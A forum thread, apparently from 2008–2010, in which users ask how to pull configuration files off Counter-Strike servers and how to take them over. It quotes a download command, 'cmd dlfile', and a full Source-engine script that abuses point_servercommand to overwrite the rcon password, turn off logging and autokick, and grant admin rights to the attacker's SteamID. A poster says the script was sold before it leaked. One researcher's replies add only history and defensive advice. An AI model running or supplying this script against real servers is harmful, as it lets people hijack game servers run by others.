CS 1.6 sv_allowdownload 1

gabrielfaria · **Joined:** 21 Dec 2008 19:01 **Posts:** 9

Hey everyone.
Im new here.
I was reading about q3dirtrav wich its possible to download sv files from a server with allowdownload 1.
So in Counter Strike 1.6 its possible to use this bug for donwloading files as well? If so, how? q3dirtrav is only for q3 engine based games.

Thanks a lot

aluigi · **Posted:** 21 Dec 2008 21:27

I can't give comments on the latest versions because I don't touch HL by years.
anyway the following comes from the far 2003:

http://www.securityfocus.com/archive/1/344996

valve limited the problem adding a list of extensions which can't be downloaded in version x.1.1.1e: cfg, lst, exe, vbs, com, bat, dll, ini and log

I don't know what is the current situation and level of security anyway downloads (and uploads because if I'm not in error HL can allow them too) are ever a security risk

gabrielfaria · **Joined:** 21 Dec 2008 19:01 **Posts:** 9

So.. simply type on ingame console:
cmd dlfile server.cfg ?
If so, nothing seems to be happened.

Where the downloaded files usually go?

aluigi · **Posted:** 21 Dec 2008 21:38

yes in hl it's enough to type cmd dlfile filename
if I'm not in error HL saves the downloaded files in its root folder

gabrielfaria · **Joined:** 21 Dec 2008 19:01 **Posts:** 9

Ok.
I think thats already fixed. I cant download nothing from my server.
Any other way to get CS server files?

Thanks

aluigi · **Posted:** 21 Dec 2008 22:49

no one that I know

gabrielfaria · **Joined:** 21 Dec 2008 19:01 **Posts:** 9

I was searching on internet I and found a script that could change the rcon_pass in a server with sv_cheats 1
This is for CS source. I was wondering if it may work with 1.6:

Code:

ent_create point_servercommand; ent_setname mine
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "sv_rcon_log 0"
ent_fire mine command "mp_autokick 0"

//PRIVATE SUCCESS MSG FOR SERVERS WITH MANI ADMIN
ent_fire mine command "ma_psay PLAYERNAME rcon_password changed!"

//GIVE MANI ADMIN
    ent_fire mine command "ma_client addclient client_0l"
    ent_fire mine command "ma_client addsteam client_0l YOURSTEAMID"
    ent_fire mine command "ma_client setaflag client_0l +#"
    ent_fire mine command "ma_client setiflag client_0l +#"
    ent_fire mine kill

rcon_password omg-im-so-cool
echo "RCON EXPLOIT EXECUTED Garotinhos, im in charge!! =] [Script by steglich]"

someone got it?

UnderPL · **Joined:** 13 Jan 2009 01:48 **Posts:** 1

Can't work on HL1 mods.

aluigi · **Posted:** 13 Jan 2009 15:39

off topic:
just for curiosity I tried to find the other places where that script pasted by gabrielfaria was posted (yes I know, I have nothing better to do now) and noticed something funny.
that script has been "assigned" to at least 3 different "authors" ah ah ah thieves :)

redskull · **Joined:** 02 Feb 2009 06:29 **Posts:** 13

Their are actually 4 original authors of this script they would be Mani, Ninja, iON VASH, myself (redskull). Their is also a event scripts exploit founded by a dude named vash and a dude named Backwords surfer. its actully very sexy

aluigi · **Posted:** 02 Feb 2009 13:57

the fact is that in the scripts I saw casually on internet the listed authors are not those listed by you :)

redskull · **Joined:** 02 Feb 2009 06:29 **Posts:** 13

=D thats very funny. we've had it created for about a little over 1 maybe 2. i was selling it for a long time. then it got leaked and we just pubed it

thebullet · **Joined:** 11 Jan 2010 12:43 **Posts:** 15

Hi and my problem is same in case of CS too. Someone said he will hack the server in 30 seconds and he did it in 13 seconds. Like he got my rcon password in 13 seconds, every time I changed it...What could be the reason?

aluigi · **Posted:** 14 Jan 2010 14:48

could exist tons of reasons and there are tons of informations omitted so it's easier to ignore your post.
in any case:
- updated all your software (server/mod/blah) to the latest known version
- don't store your rcon password in the files, NO password in NO files.
that's a starting point

thebullet · **Joined:** 11 Jan 2010 12:43 **Posts:** 15

So is there any tool just like q3dirtrav for CS 1.6 to download config files or any way to jack any other file on the server?

aluigi · **Posted:** 15 Jan 2010 09:16

I have never played or used CS (1.6, source and so on) in all my life so I don't have the minimal idea.
I simply performed some vulnerability research and protocol reversing the previous summer and from my tests was possible to both upload and download files (throught some protocol modifications so I don't have the minimal idea how to test it from the game) but while the first one was vulnerable to directory traversal the second one wasn't and if I'm not in error there were also some extensions checks (I can't be more detailed because I don't remember everything, in any case if no advisory was released means it wasn't vulnerable and be sure that when I test something I test it at 360 degrees).

Luigi Auriemma

CS 1.6 sv_allowdownload 1